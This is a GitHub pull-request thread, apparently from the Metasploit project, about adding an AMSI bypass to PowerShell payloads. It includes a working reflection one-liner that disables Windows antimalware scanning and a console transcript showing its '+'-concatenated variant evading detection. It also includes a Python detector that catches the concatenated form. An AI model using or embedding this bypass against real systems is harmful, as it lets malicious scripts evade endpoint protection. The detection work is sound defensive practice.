Closed phra closed 5 years ago
@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?
@bwatters-r7 just try any PowerShell payloads on an updated Win 10 machine with AMSI.
as reference: https://iwantmore.pizza/posts/amsi.html
Very interesting thanks @phra
I didn't expect the '+' to work so well:
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>
Thanks @phra We still need to add this to webdelivery (preferably as an off-by-default option). It would be nice to have the strings obfuscated dynamically, but this will do for now.
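As an added defender-side example (not Metasploit code and not from any commit in this thread): a small Python check that collapses '+'-joined PowerShell string literals in logged script block text before matching on the AmsiUtils / amsiInitFailed strings, so the concatenated variant from the transcript above is caught by the same check as the plain one. The sample lines are constructed from the two commands in the transcript; only single-quoted literals are handled.

```python
import re

# Added example (not Metasploit code): normalise PowerShell string
# concatenation in script block log text before matching indicators, so
# 'Ams'+'iUtils' is seen as 'AmsiUtils'. Only single-quoted literals are
# handled here; double-quoted (interpolated) strings are left untouched.

# Strings whose presence points at tampering with the AMSI initialisation state.
INDICATORS = ("amsiutils", "amsiinitfailed")

# A run of two or more single-quoted literals joined by '+', with optional spaces.
_CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
_LITERAL = re.compile(r"'([^']*)'")


def normalize_concat(script):
    """Collapse 'a'+'b'+'c' into 'abc' so the joined literal becomes visible."""
    def _join(match):
        parts = _LITERAL.findall(match.group(0))
        return "'" + "".join(parts) + "'"
    return _CONCAT.sub(_join, script)


def find_indicators(script, normalize=True):
    """Return the indicator strings present in one script block (case-insensitive)."""
    text = normalize_concat(script) if normalize else script
    text = text.lower()
    return [ind for ind in INDICATORS if ind in text]


def flag_script_blocks(lines):
    """Return (line_number, indicators) for every logged script block that hits."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = find_indicators(line)
        if found:
            hits.append((number, found))
    return hits


# Constructed sample script block text, modelled on the two commands in the thread.
SAMPLE_LINES = [
    "Get-ChildItem 'C:\\Users\\User'",
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
    "$Ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);",
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');"
    "$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);",
    "Write-Host ('hel'+'lo')",
]

if __name__ == "__main__":
    for number, found in flag_script_blocks(SAMPLE_LINES):
        print(f"line {number}: {', '.join(found)}")
```

Without normalisation the concatenated line produces no hit, which is exactly the gap the '+' trick exploits; the same idea extends to other literal-splitting tricks once the joined text is reconstructed.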
> I didn't expect the '+' to work so well:
> It would be nice to have the strings obfuscated dynamically, but this will do for now.
Empire includes https://github.com/danielbohannon/Invoke-Obfuscation, but it depends on PowerShell, and that means adding it as an optional(?) dependency or embedding it directly within the project with a ~50mb overhead of stuff.
Writing a simpler, similar project in Ruby may be overkill.
Any idea?
Was the prepend_protections_bypass option defined somewhere? I don't see the setting available yet with Framework Version: 5.0.19-dev.
@phra apologies, I didn't send a PR with that part; I think I tested with this commit: https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc
Oh ok, I hope it will be merged into master soon! Regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as the target.
Any update? I still cannot easily add the AMSI bypass to PowerShell payloads.
@timwr any update on this?
@phra did you test the commit I posted above? https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc Maybe you can send a PR to the framework repository that enables it for web_delivery?
> maybe you can send a PR to the framework repository that enables it for web_delivery?
@timwr see https://github.com/rapid7/metasploit-framework/pull/12446
Will fix https://github.com/rapid7/metasploit-framework/issues/11283